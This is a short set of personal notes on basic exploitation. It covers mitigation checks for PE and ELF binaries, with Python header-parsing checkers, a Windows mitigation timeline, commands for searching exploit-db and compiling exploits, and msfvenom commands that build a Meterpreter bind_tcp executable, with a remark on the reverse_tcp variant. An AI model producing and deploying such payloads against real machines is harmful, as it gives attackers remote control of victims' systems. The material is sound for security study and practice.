Last changed: 20.07.2020
basic exploitation
Here I collect some notes on finding or writing simple exploits.
The websites root-me.org and io.netgarage.org offer many different challenges for practice.
exploit mitigations
To detect optional exploit mitigation features in PE binaries, use pesec from the pev toolkit:
pesec binary.exe
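What pesec reads for DEP, ASLR, CFG and friends is mostly the DllCharacteristics word of the PE optional header. The following is an added example (not pev's code and not from the original notes) that walks from the DOS header to that field and decodes the bits; build_pe only constructs a synthetic, non-loadable PE32+ image so the checker can be exercised without a real binary.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits of the PE optional header (winnt.h).
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",  # 64-bit ASLR with high-entropy addresses
    0x0040: "DYNAMIC_BASE",     # image may be relocated: ASLR
    0x0100: "NX_COMPAT",        # image is DEP-compatible
    0x0400: "NO_SEH",           # image uses no structured exception handlers
    0x4000: "GUARD_CF",         # Control Flow Guard instrumented
}


def pe_dll_characteristics(data):
    """Return the DllCharacteristics field of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20  # skip PE signature and the 20-byte COFF file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both layouts.
    return struct.unpack_from("<H", data, opt + 70)[0]


def check_pe(data):
    """Map each known mitigation flag to whether the image sets it."""
    dc = pe_dll_characteristics(data)
    return {name: bool(dc & bit) for bit, name in DLL_CHARACTERISTICS.items()}


def build_pe(dll_characteristics):
    """Constructed test image (not a real executable): DOS stub, PE signature,
    COFF header and a bare 112-byte PE32+ optional header without data directories.
    Only the fields check_pe reads carry meaningful values."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                 # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 112, 0x22)     # x64, opt hdr size 112
    opt = (struct.pack("<H", 0x20B) + b"\0" * 68
           + struct.pack("<H", dll_characteristics) + b"\0" * 40)
    return dos + b"PE\0\0" + coff + opt


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        for name, enabled in check_pe(f.read()).items():
            print("%-16s %s" % (name, "yes" if enabled else "no"))
```

SafeSEH is deliberately not covered: it is signalled by a populated SEHandlerTable in the load config directory rather than by a header bit, which is why pesec has to parse that directory as well.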
For ELF binaries you can use checksec.sh:
./checksec --file=elf_binary
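checksec.sh gets its NX, PIE and RELRO verdicts from the ELF header and program headers and its canary verdict from the symbol table. The following added example (my own code, not checksec's and not from the original notes) reimplements those four checks for little-endian ELF64 with nothing but struct; the canary check is a raw search for the __stack_chk_fail string instead of a symbol-table walk, which is a documented shortcut here. build_elf only constructs a synthetic, non-loadable image carrying the headers the checker reads, so the checks can be run without a compiled binary.

```python
import struct

# ELF constants from elf.h
ET_EXEC, ET_DYN = 2, 3
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1


def parse_elf64(data):
    """Return (e_type, program headers) of a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags, p_offset, _, _, p_filesz, _, _ = struct.unpack_from(
            "<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        phdrs.append({"type": p_type, "flags": p_flags,
                      "offset": p_offset, "filesz": p_filesz})
    return e_type, phdrs


def dynamic_bind_now(data, phdr):
    """Walk the PT_DYNAMIC entries looking for any of the 'bind now' markers."""
    off, end = phdr["offset"], phdr["offset"] + phdr["filesz"]
    while off + 16 <= min(end, len(data)):
        tag, val = struct.unpack_from("<qQ", data, off)
        if tag == DT_NULL:
            break
        if (tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
            return True
        off += 16
    return False


def check_elf(data):
    e_type, phdrs = parse_elf64(data)
    stack = [p for p in phdrs if p["type"] == PT_GNU_STACK]
    # Linux maps an executable stack when PT_GNU_STACK is absent, so absence counts as no NX.
    nx = bool(stack) and not (stack[0]["flags"] & PF_X)
    # ET_DYN is also the type of shared libraries; checksec reports both as PIE.
    pie = e_type == ET_DYN
    has_relro = any(p["type"] == PT_GNU_RELRO for p in phdrs)
    bind_now = any(dynamic_bind_now(data, p) for p in phdrs if p["type"] == PT_DYNAMIC)
    relro = "full" if has_relro and bind_now else "partial" if has_relro else "none"
    # Shortcut for the symbol-table lookup checksec does: look for the reference by name.
    canary = b"__stack_chk_fail" in data
    return {"nx": nx, "pie": pie, "relro": relro, "canary": canary}


def build_elf(pie=True, nx=True, relro="full", canary=True):
    """Constructed test image (not loadable): an ELF64 header, the program headers
    the checker inspects and a tiny dynamic section."""
    tags = ([(DT_FLAGS, DF_BIND_NOW)] if relro == "full" else []) + [(DT_NULL, 0)]
    dyn = b"".join(struct.pack("<qQ", t, v) for t, v in tags)
    types = [PT_DYNAMIC, PT_GNU_STACK] + ([PT_GNU_RELRO] if relro != "none" else [])
    dyn_off = 64 + 56 * len(types)
    phdrs = b""
    for t in types:
        flags = PF_R | PF_W | (PF_X if t == PT_GNU_STACK and not nx else 0)
        off, size = (0, 0) if t == PT_GNU_STACK else (dyn_off, len(dyn))
        phdrs += struct.pack("<IIQQQQQQ", t, flags, off, off, off, size, size, 8)
    ident = b"\x7fELF" + bytes([2, 1, 1]) + b"\0" * 9   # ELF64, little-endian, version 1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC, 62, 1,
                               0, 64, 0, 0, 64, 56, len(types), 64, 0, 0)
    return ehdr + phdrs + dyn + (b"__stack_chk_fail\0" if canary else b"")


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        for key, value in check_elf(f.read()).items():
            print("%-7s %s" % (key, value))
```

Run it against a real binary with `python3 elfcheck.py ./elf_binary` (file name assumed) and compare with checksec's output; the differences you will see come from the two documented shortcuts, ET_DYN counting as PIE and the string search standing in for the symbol table.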
windows mitigation timeline
The following table lists some exploit mitigations and the Windows version that introduced them (SMEP needs Windows 8, Exploit Guard Windows 10).

XP SP2 | Vista | Windows 7 | Windows 8 | Windows 10 |
---|---|---|---|---|
DEP | ASLR | EMET | GuardPages | CFG |
SafeSEH | LFH | | SMEP | Exploit Guard |
SafeUnlink | SEHOP | | | |
Canaries | | | | |
You can check the Exploit Guard status (the system-wide mitigation defaults) in Windows 10 with PowerShell:
Get-ProcessMitigation -System
find publicly available exploits
online exploit resources
www.exploit-db.com/search/
google: <search_string> exploit site:securityfocus.com inurl:bid
exploit-db (offline)
searchsploit <search_string>
grep -i <search_string> /usr/share/exploitdb/files_exploits.csv
compilation
show local libc version
Executing glibc's libc.so.6 directly prints its version banner; ldd is only used to find its path:
$(ldd $(which ls) | grep libc.so | cut -d " " -f3) | head -n1
compile for 32bit target
apt install gcc-multilib
gcc -m32 exploit.c -o exploit
compile for windows target
/home/user/.wine/drive_c/MinGW/bin/gcc.exe exploit.c -o exploit.exe
Another way to set up the cross-compile environment is to install veil-evasion.
meterpreter binary
msfvenom -l payloads
msfvenom -p windows/x64/meterpreter/bind_tcp --list-options
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1337 -f exe -o meterpreter.exe
bind_tcp makes the payload listen on the target on LPORT; for a connection back to your own machine use the matching reverse_tcp payload with LHOST set instead.